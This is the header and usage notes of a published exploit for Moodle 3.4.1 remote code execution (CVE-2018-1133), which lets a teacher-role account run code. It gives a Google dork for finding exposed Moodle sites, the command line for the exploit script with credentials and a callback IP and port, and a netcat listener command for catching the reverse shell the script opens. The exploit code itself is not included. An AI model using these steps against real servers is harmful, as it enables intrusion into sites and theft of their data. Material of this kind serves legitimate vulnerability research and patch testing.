• Exploit Title: Moodle v3.4.1 RCE Exploit
• Google Dork: inurl:"/course/jumpto.php?jump="
• Date: 15 March 2019
• Exploit Author: Darryn Ten
• Vendor Homepage: https://moodle.org
• Software Link: https://github.com/moodle/moodle/archive/v3.4.1.zip
• Version: 3.4.1 (Possibly < 3.5.0 and maybe even 3.x)
• Tested on: Linux with Moodle v3.4.1
• CVE : CVE-2018-1133

A user with the teacher role is able to execute arbitrary code.

php MoodleExploit.php url=http:https://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1

user       The account username
pass       The password to the account
ip         Callback IP
port       Callback Port
course     Valid course ID belonging to the teacher

Make sure you're running a netcat listener on the specified port before executing this script.

nc -lnvp 1010

This will attempt to open up a reverse shell to the listening IP and port.

This exploit is based on information provided by Robin Peraglie.

Additional Reading: https://blog.ripstech.com/2018/moodle-remote-code-execution